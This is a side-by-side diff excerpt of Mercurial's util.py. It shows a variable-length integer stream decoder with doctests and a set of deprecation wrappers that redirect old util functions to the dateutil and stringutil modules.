4018 value >>= 7
4016 value >>= 7
4019 bytes.append(pycompat.bytechr(bits))
4017 bytes.append(pycompat.bytechr(bits))
4020
4018
4021 return ''.join(bytes)
4019 return ''.join(bytes)
4022
4020
4023 def uvarintdecodestream(fh):
4021 def uvarintdecodestream(fh):
4024 """Decode an unsigned variable length integer from a stream.
4022 """Decode an unsigned variable length integer from a stream.
4025
4023
4026 The passed argument is anything that has a ``.read(N)`` method.
4024 The passed argument is anything that has a ``.read(N)`` method.
4027
4025
4028 >>> try:
4026 >>> try:
4029 ... from StringIO import StringIO as BytesIO
4027 ... from StringIO import StringIO as BytesIO
4030 ... except ImportError:
4028 ... except ImportError:
4031 ... from io import BytesIO
4029 ... from io import BytesIO
4032 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4030 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4033 0
4031 0
4034 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4032 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4035 1
4033 1
4036 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4034 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4037 127
4035 127
4038 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4036 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4039 1337
4037 1337
4040 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4038 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4041 65536
4039 65536
4042 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4040 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4043 Traceback (most recent call last):
4041 Traceback (most recent call last):
4044 ...
4042 ...
4045 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4043 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4046 """
4044 """
4047 result = 0
4045 result = 0
4048 shift = 0
4046 shift = 0
4049 while True:
4047 while True:
4050 byte = ord(readexactly(fh, 1))
4048 byte = ord(readexactly(fh, 1))
4051 result |= ((byte & 0x7f) << shift)
4049 result |= ((byte & 0x7f) << shift)
4052 if not (byte & 0x80):
4050 if not (byte & 0x80):
4053 return result
4051 return result
4054 shift += 7
4052 shift += 7
4055
4053
4056 ###
4054 ###
4057 # Deprecation warnings for util.py splitting
4055 # Deprecation warnings for util.py splitting
4058 ###
4056 ###
4059
4057
4060 def _deprecatedfunc(func, version):
4058 def _deprecatedfunc(func, version):
4061 def wrapped(*args, **kwargs):
4059 def wrapped(*args, **kwargs):
4062 fn = pycompat.sysbytes(func.__name__)
4060 fn = pycompat.sysbytes(func.__name__)
4063 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4061 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
4064 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4062 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
4065 nouideprecwarn(msg, version)
4063 nouideprecwarn(msg, version)
4066 return func(*args, **kwargs)
4064 return func(*args, **kwargs)
4067 wrapped.__name__ = func.__name__
4065 wrapped.__name__ = func.__name__
4068 return wrapped
4066 return wrapped
4069
4067
4070 defaultdateformats = dateutil.defaultdateformats
4068 defaultdateformats = dateutil.defaultdateformats
4071 extendeddateformats = dateutil.extendeddateformats
4069 extendeddateformats = dateutil.extendeddateformats
4072 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4070 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
4073 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4071 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
4074 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4072 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
4075 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4073 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
4076 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4074 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
4077 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4075 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
4078 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4076 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
4079
4077
4080 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4078 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
4081 binary = _deprecatedfunc(stringutil.binary, '4.6')
4079 binary = _deprecatedfunc(stringutil.binary, '4.6')
4082 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4080 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
4083 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4081 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
4084 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4082 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
4085 email = _deprecatedfunc(stringutil.email, '4.6')
4083 email = _deprecatedfunc(stringutil.email, '4.6')
4086 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4084 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
4087 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4085 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
4088 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4086 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
4089 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4087 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
4090 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4088 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
4091 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4089 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
4092 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
4090 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now